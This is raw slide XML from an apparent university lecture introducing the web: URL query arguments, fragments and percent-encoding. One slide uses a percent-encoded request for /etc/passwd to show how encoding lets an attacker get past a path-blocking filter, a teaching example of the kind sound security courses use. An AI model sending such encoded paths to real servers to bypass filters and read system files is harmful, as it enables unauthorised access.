            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Arguments are supplied as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>name=value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> pairs</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Arguments are separated with ampersands (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>catalog.charlotte.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>preview_program.php?catoid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=30&amp;poid=8146</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;22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Fragment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;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fragment is optional</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Located after a hash sign (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Not sent to the web server! Only used by the web browser</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Common usage: Tells the web browser to scroll to a part of a webpage</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.jianxiang.info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/teaching/ITIS6200/2023fa/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>index.html#schedule</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;23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 Escaping</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;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URLs are designed to contain printable, human-readable characters (ASCII)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What if we want to include non-printable characters in the URL?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Recall: URLs have special characters (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What if we want to use a special character in the URL?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Solution: URL encoding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Notation: Percent sign (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) followed by the hexadecimal value of the character</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%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>' (spacebar)</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%35</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>' (hash sign)</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%50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>' (printable characters can be encoded too!)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security issues: makes scanning for malicious URLs harder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Suppose you want to block all requests to the path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/etc/passwd</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What if an attacker makes a request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>%2F%65%74%63%2F%70%61%73%73%77%64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We’ll study this issue more later</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;24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Introduction to Web</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40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4028613" y="2611475"/>
            <a:ext cx="4443845" cy="1017600"/>
            <a:chOff x="4028613" y="2611475"/>
            <a:chExt cx="4443845" cy="1017600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="250" name="Google Shape;250;p40"/>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251" name="Google Shape;251;p40"/>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52" name="Google Shape;252;p40"/>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53" name="Google Shape;253;p40"/>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54" name="Google Shape;25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55" name="Google Shape;25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56" name="Google Shape;256;p40"/>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57" name="Google Shape;257;p40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="256" idx="3"/>
            <a:endCxn id="258" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510438" y="2566525"/>
            <a:ext cx="529800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="259" name="Google Shape;259;p40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2040238" y="1104775"/>
            <a:ext cx="3239100" cy="2599500"/>
            <a:chOff x="2040238" y="1104775"/>
            <a:chExt cx="3239100" cy="2599500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="258" name="Google Shape;258;p40"/>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/pictures</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 1.jpg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0" name="Google Shape;260;p40"/>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61" name="Google Shape;261;p40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2040238" y="3737100"/>
            <a:ext cx="6200700" cy="400200"/>
            <a:chOff x="2040238" y="3737100"/>
            <a:chExt cx="6200700" cy="400200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="262" name="Google Shape;262;p40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2040238" y="3737100"/>
              <a:ext cx="6200700" cy="400200"/>
              <a:chOff x="2040238" y="3737100"/>
              <a:chExt cx="6200700" cy="400200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="263" name="Google Shape;263;p40"/>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264" name="Google Shape;264;p40"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="263"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65" name="Google Shape;265;p40"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="263"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57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="257"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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71" name="Google Shape;27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82" name="Google Shape;282;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426125" y="4214225"/>
            <a:ext cx="4901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request a file from the server with a URL.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838450" y="4578650"/>
            <a:ext cx="47223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/pictures/1.jpg</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Google Shape;249;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD5945AF-CD25-E0A8-4457-CE87287E6CCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4028613" y="2611475"/>
            <a:ext cx="4443845" cy="1017600"/>
            <a:chOff x="4028613" y="2611475"/>
            <a:chExt cx="4443845" cy="1017600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Google Shape;250;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7BCD87-486A-E4C4-2B1B-069327DF48C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19" name="Google Shape;251;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF26BA5-44E6-B144-FE12-93FAF9EC407D}"/>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0" name="Google Shape;252;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8924C16C-FCCA-89A7-D3BE-44CFF2C9D5E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1" name="Google Shape;253;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E11423A-8A0E-1253-A0FC-A009932EA8B2}"/>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2" name="Google Shape;256;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F53BFDA3-C8E0-622D-42AF-514FAE195BDC}"/>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3" name="Google Shape;257;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9561AB27-A7FE-E94E-99BD-02A49629522F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="3"/>
            <a:endCxn id="25"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24" name="Google Shape;259;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D4F341-AEAE-36B7-7C5E-54D8662BC638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2040238" y="1104775"/>
            <a:ext cx="3239100" cy="2599500"/>
            <a:chOff x="2040238" y="1104775"/>
            <a:chExt cx="3239100" cy="2599500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Google Shape;258;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E26FFBC-4B91-837E-9E73-09DC0EEE965D}"/>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/pictures</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 1.jpg</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 name="Google Shape;260;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5332330-FD5F-6B6E-C055-1468685513F5}"/>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7" name="Google Shape;261;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5DA6042-1747-441E-2F6D-13C06F4FFCCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2040238" y="3737100"/>
            <a:ext cx="6200700" cy="400200"/>
            <a:chOff x="2040238" y="3737100"/>
            <a:chExt cx="6200700" cy="400200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28" name="Google Shape;262;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB86859F-472B-D133-FF03-782B9035B8C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2040238" y="3737100"/>
              <a:ext cx="6200700" cy="400200"/>
              <a:chOff x="2040238" y="3737100"/>
              <a:chExt cx="6200700" cy="400200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Google Shape;263;p40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{196EA18D-A6A1-F11E-F3A1-7C193CEDCF45}"/>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31" name="Google Shape;264;p40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1117179B-03FC-C855-FB08-28D7E7CCA37C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="30"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9" name="Google Shape;265;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A628B8-B60E-0920-6504-DE177D60E6C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:endCxn id="30"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90" name="Google Shape;29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01" name="Google Shape;301;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426125" y="4214225"/>
            <a:ext cx="5318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also request some computation from the server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838450" y="4578650"/>
            <a:ext cx="50436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circle&amp;size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=large</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Google Shape;249;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E7EEF3-4708-0084-9018-96D2FC60A9C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4028613" y="2611475"/>
            <a:ext cx="4443845" cy="1017600"/>
            <a:chOff x="4028613" y="2611475"/>
            <a:chExt cx="4443845" cy="1017600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="3" name="Google Shape;250;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9840408F-4F48-D201-1F22-7AB35C7351F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4" name="Google Shape;251;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50FC4C08-B6CD-C763-7AD7-66EC3C8014DC}"/>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5" name="Google Shape;252;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28361465-E0F4-0C4E-2AF5-17903B39536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solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t> draw(shape, size)</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6" name="Google Shape;253;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B07C7F1B-93AE-7F77-95DF-C2091530C017}"/>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7" name="Google Shape;256;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A0736F-82DC-29E2-676C-364FD48A0F91}"/>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8" name="Google Shape;257;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F00280B2-6A16-858D-800D-9A9A4FA387AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="10"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9" name="Google Shape;259;p40">
            <a:extLst>
